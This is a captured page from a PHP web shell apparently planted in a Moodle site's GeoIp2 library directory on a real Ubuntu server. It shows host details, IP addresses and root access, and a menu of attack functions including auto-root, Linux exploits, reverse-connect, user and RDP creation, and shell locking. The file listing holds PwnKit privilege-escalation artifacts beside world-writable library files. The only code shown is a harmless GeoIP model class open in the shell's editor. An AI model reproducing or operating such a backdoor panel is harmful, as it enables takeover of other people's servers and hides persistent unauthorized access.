Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
maxmind /
GeoIp2 /
Model /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
AbstractModel.php
1.09
KB
-rwxrwxrwx
AnonymousIp.php
2.02
KB
-rwxrwxrwx
Asn.php
1.33
KB
-rwxrwxrwx
City.php
3.12
KB
-rwxrwxrwx
ConnectionType.php
1.11
KB
-rwxrwxrwx
Country.php
2.41
KB
-rwxrwxrwx
Domain.php
1.05
KB
-rwxrwxrwx
Enterprise.php
349
B
-rwxrwxrwx
Insights.php
349
B
-rwxrwxrwx
Isp.php
1.68
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : AnonymousIp.php
<?php namespace GeoIp2\Model; use GeoIp2\Util; /** * This class provides the GeoIP2 Anonymous IP model. * * @property-read bool $isAnonymous This is true if the IP address belongs to * any sort of anonymous network. * @property-read bool $isAnonymousVpn This is true if the IP address is * registered to an anonymous VPN provider. If a VPN provider does not * register subnets under names associated with them, we will likely only * flag their IP ranges using the isHostingProvider property. * @property-read bool $isHostingProvider This is true if the IP address belongs * to a hosting or VPN provider (see description of isAnonymousVpn property). * @property-read bool $isPublicProxy This is true if the IP address belongs to * a public proxy. * @property-read bool $isTorExitNode This is true if the IP address is a Tor * exit node. * @property-read string $ipAddress The IP address that the data in the model is * for. * @property-read string $network The network in CIDR notation associated with * the record. In particular, this is the largest network where all of the * fields besides $ipAddress have the same value. */ class AnonymousIp extends AbstractModel { protected $isAnonymous; protected $isAnonymousVpn; protected $isHostingProvider; protected $isPublicProxy; protected $isTorExitNode; protected $ipAddress; protected $network; /** * @ignore * * @param mixed $raw */ public function __construct($raw) { parent::__construct($raw); $this->isAnonymous = $this->get('is_anonymous'); $this->isAnonymousVpn = $this->get('is_anonymous_vpn'); $this->isHostingProvider = $this->get('is_hosting_provider'); $this->isPublicProxy = $this->get('is_public_proxy'); $this->isTorExitNode = $this->get('is_tor_exit_node'); $ipAddress = $this->get('ip_address'); $this->ipAddress = $ipAddress; $this->network = Util::cidr($ipAddress, $this->get('prefix_len')); } }
Close